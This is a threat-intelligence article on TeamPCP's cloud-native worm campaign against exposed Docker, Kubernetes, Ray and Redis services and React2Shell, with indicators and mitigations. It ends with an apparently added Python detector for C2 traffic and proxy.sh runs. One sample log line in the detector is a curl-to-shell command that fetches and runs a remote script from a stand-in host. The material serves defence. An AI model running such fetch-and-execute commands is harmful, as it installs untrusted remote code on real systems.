
TeamPCP’s Cloud‑Native Worm‑Driven Campaign Targets Docker, Kubernetes, and React2Shell

A massive worm‑driven campaign by threat group TeamPCP leverages exposed Docker APIs, Kubernetes clusters, Ray dashboards and the React2Shell CVE‑2025‑55182 to build a self‑propagating cloud‑native criminal ecosystem.
9 February 2026 by TechStora Editorial Board

Overview

Security researchers have identified a large‑scale, worm‑driven operation that began around 25 December 2025. The campaign, attributed to the threat cluster TeamPCP (also known as DeadCatx3, PCPcat, PersyPCP and ShellForce), systematically abuses misconfigured cloud‑native services to create a distributed proxy, scanning, and data‑exfiltration infrastructure.

Attack Infrastructure

TeamPCP treats modern cloud environments as a “self‑propagating criminal ecosystem.” By scanning the internet for exposed Docker APIs, Kubernetes clusters, Ray dashboards and Redis instances, the group automatically deploys a chain of payloads that:

  • Establish a foothold on the compromised host.
  • Fingerprint the environment (e.g., detect Kubernetes).
  • Drop secondary, cluster‑specific payloads.
  • Install proxy, P2P and tunneling utilities via proxy.sh.
  • Connect to a Sliver‑based C2 server (67.217.57[.]240).

Exploited Services & Vulnerabilities

The operation relies on publicly known weaknesses rather than novel zero‑days:

  • Unauthenticated Docker Engine API endpoints.
  • Open Kubernetes API servers and dashboard interfaces.
  • Unprotected Ray dashboard ports.
  • Exposed Redis instances without authentication.
  • React2Shell (CVE‑2025‑55182, CVSS 10.0) in affected React/Next.js applications.

Malware Components

Key binaries and scripts used by TeamPCP include:

  • proxy.sh – installs proxies, P2P tools and continuous scanners.
  • Shell‑ and Python‑based payloads that retrieve additional modules from external servers.
  • Cluster‑specific secondary payloads that run only inside Kubernetes environments.
  • Sliver open‑source C2 framework for post‑exploitation command and control.

Operational Impact

Compromised infrastructure is monetized through multiple channels:

  • Cryptocurrency mining on hijacked compute resources.
  • Data hosting and proxy services for other criminal actors.
  • Exfiltration of credential dumps, identity records and corporate data, later published via the ShellForce Telegram channel.
  • Ransomware deployment, extortion and fraud enabled by the stolen information.

The group’s Telegram channel, with over 700 members, regularly shares stolen data from victims in Canada, Serbia, South Korea, the U.A.E. and the United States.

Mitigation & Defense

Defenders should adopt a layered approach:

  • Enforce strict authentication and network segmentation for Docker, Kubernetes and Redis endpoints.
  • Patch React/Next.js applications for CVE‑2025‑55182 immediately.
  • Monitor for anomalous outbound traffic to known C2 IPs (e.g., 67.217.57.240) and for the execution of proxy.sh or similar scripts.
  • Deploy threat‑intel feeds that flag the TeamPCP identifiers and associated IOCs.
  • Utilize AI‑assisted, context‑aware forensics to accelerate cloud investigation and isolate compromised workloads.
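As an added example (not code from the article or from any tool it names), the following Python flags two of the indicators the list above calls out, outbound connections to the listed C2 address and executions of proxy.sh, over constructed flow and process log lines; the log line formats and the example.invalid URL are assumptions.

```python
import re

def refang(ioc: str) -> str:
    """Turn a defanged indicator such as 67.217.57[.]240 back into a usable value."""
    return ioc.replace("[.]", ".")

# Indicators quoted in the article: the Sliver C2 address and the dropper script name.
C2_IPS = {refang("67.217.57[.]240")}
SUSPICIOUS_SCRIPTS = {"proxy.sh"}

# Constructed sample logs (assumed formats): one flow record and one process record per line.
SAMPLE_FLOW_LOG = """\
2026-02-09T10:01:02Z src=10.0.3.14 dst=67.217.57.240 dport=443 proto=tcp
2026-02-09T10:01:05Z src=10.0.3.14 dst=140.82.112.3 dport=443 proto=tcp
2026-02-09T10:02:11Z src=10.0.7.2 dst=67.217.57.240 dport=8888 proto=tcp
"""
SAMPLE_PROCESS_LOG = """\
2026-02-09T10:00:58Z host=node-3 pid=4121 exe=/bin/sh cmd="sh -c curl -s http://example.invalid/proxy.sh | sh"
2026-02-09T10:01:00Z host=node-3 pid=4130 exe=/bin/bash cmd="bash /tmp/proxy.sh"
2026-02-09T10:03:00Z host=node-5 pid=5002 exe=/usr/bin/kubectl cmd="kubectl get pods"
"""

FLOW_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)")
PROC_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) pid=(?P<pid>\d+) exe=\S+ cmd="(?P<cmd>[^"]*)"')

def flag_c2_flows(log_text: str, c2_ips=C2_IPS):
    """Return (timestamp, src, dst, dport) for every flow whose destination is a known C2 IP."""
    hits = []
    for line in log_text.splitlines():
        m = FLOW_RE.match(line)
        if m and m.group("dst") in c2_ips:
            hits.append((m.group("ts"), m.group("src"), m.group("dst"), int(m.group("dport"))))
    return hits

def flag_script_executions(log_text: str, names=SUSPICIOUS_SCRIPTS):
    """Return (timestamp, host, pid, cmd) for every process whose command line references a listed script."""
    hits = []
    for line in log_text.splitlines():
        m = PROC_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        # Compare the basename of each token so both "bash /tmp/proxy.sh" and
        # "curl .../proxy.sh | sh" are caught regardless of path or URL prefix.
        tokens = re.split(r"[\s|;&]+", cmd)
        if any(tok.rsplit("/", 1)[-1] in names for tok in tokens):
            hits.append((m.group("ts"), m.group("host"), int(m.group("pid")), cmd))
    return hits

if __name__ == "__main__":
    for hit in flag_c2_flows(SAMPLE_FLOW_LOG) + flag_script_executions(SAMPLE_PROCESS_LOG):
        print("ALERT", hit)
```

Point the two functions at your own flow and process exports by adapting the two regular expressions; the C2 set can be extended with any further indicators a threat‑intel feed publishes for this campaign.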

Conclusion

TeamPCP’s campaign demonstrates that sophisticated, cloud‑native cybercrime can be built on well‑known tools and misconfigurations. The real danger lies in the automation, scale and integration of the scanning, exploitation, persistence and monetization stages, which turn ordinary cloud assets into a profitable criminal platform. Prompt remediation of exposed services and continuous monitoring are essential to disrupting this evolving threat.